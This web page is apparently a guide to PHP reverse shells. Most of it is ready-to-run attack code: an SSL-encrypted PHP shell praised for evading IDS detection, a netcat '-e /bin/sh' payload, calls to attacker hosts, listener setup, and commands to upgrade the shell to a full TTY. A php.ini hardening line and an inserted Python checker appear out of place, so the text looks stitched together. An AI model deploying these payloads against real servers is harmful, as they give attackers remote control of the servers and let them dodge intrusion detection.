Reverse Shell Php Top Direct

$ip = getenv('ATTACKER_IP');
$port = getenv('ATTACKER_PORT');

On your attacking machine (Kali Linux or any VPS), you need a listener.

nc -lvnp 4444

In php.ini, modify the disable_functions directive:

disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,fsockopen,pfsockopen,stream_socket_client

Note: This breaks legitimate apps (e.g., WordPress updates). Test in staging first.
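To confirm that a deployed php.ini actually carries the directive above, this added example (not part of the original page) parses the file text and reports which of the listed functions are still callable. The sample php.ini content and the helper names are constructed for illustration.

```python
import re

# Function names taken from the disable_functions line above.
REQUIRED = frozenset(
    "exec passthru shell_exec system proc_open popen curl_exec curl_multi_exec "
    "parse_ini_file show_source fsockopen pfsockopen stream_socket_client".split()
)

def parse_disable_functions(ini_text):
    """Return the effective disable_functions set from php.ini text.

    A later assignment of the directive replaces an earlier one, and a line
    starting with ';' is a comment, so a commented-out entry disables nothing.
    Names are compared exactly as written in the file.
    """
    effective = set()
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")):
            continue  # blank line, comment, or section header such as [PHP]
        key, sep, value = line.partition("=")
        if not sep or key.strip() != "disable_functions":
            continue
        value = value.split(";", 1)[0].strip().strip('"')  # drop trailing comment
        effective = {name for name in re.split(r"[,\s]+", value) if name}
    return effective

def missing_functions(ini_text):
    """Functions from REQUIRED that the effective directive leaves enabled."""
    return sorted(REQUIRED - parse_disable_functions(ini_text))

# Constructed sample: the final assignment wins and still omits the socket functions.
SAMPLE_INI = """\
[PHP]
; disable_functions = exec,system   (commented out, has no effect)
disable_functions = exec,passthru,shell_exec,system
memory_limit = 128M
disable_functions = exec, passthru, shell_exec, system, proc_open, popen ; hardening pass
"""

if __name__ == "__main__":
    gaps = missing_functions(SAMPLE_INI)
    print("still enabled:", ", ".join(gaps) if gaps else "none")
```

Run it against the php.ini that the web SAPI loads, since the CLI and FPM often read different files.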

Plaintext traffic is easily detected by IDS/IPS (Snort rules looking for bash -i or id;). An SSL-encrypted shell looks like regular HTTPS traffic.

Requirements: OpenSSL extension enabled on the victim.

Attacker Prep:

# Generate a self-signed cert
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Start SSL listener
ncat --ssl --ssl-cert cert.pem --ssl-key key.pem -lvnp 443

PHP Payload:

<?php
$context = stream_context_create(['ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$sock = stream_socket_client('ssl://YOUR_IP:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
if ($sock) 
    while ($cmd = fread($sock, 2048)) 
        $output = shell_exec(trim($cmd) . " 2>&1");
        fwrite($sock, $output . "\n# ");
fclose($sock);
?>

Rating: 9/10 for evasion.

The simple script might not work on all systems due to differences in the nc command or its location. A more universally compatible version can be:

<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$p = popen("nc $ip $port -e /bin/sh", "w");
if (!$p) 
    die("Failed to create process");
?>

Attacker machine (Linux):

nc -lvnp 4444

Or for a more stable TTY:

rlwrap nc -lvnp 4444

Or use socat:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Once connected, upgrade to a fully interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script /dev/null -c bash

A reverse shell flips the script. The victim server initiates the connection outbound to the attacker’s machine.

Using stream_socket_client() with SSL:

$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);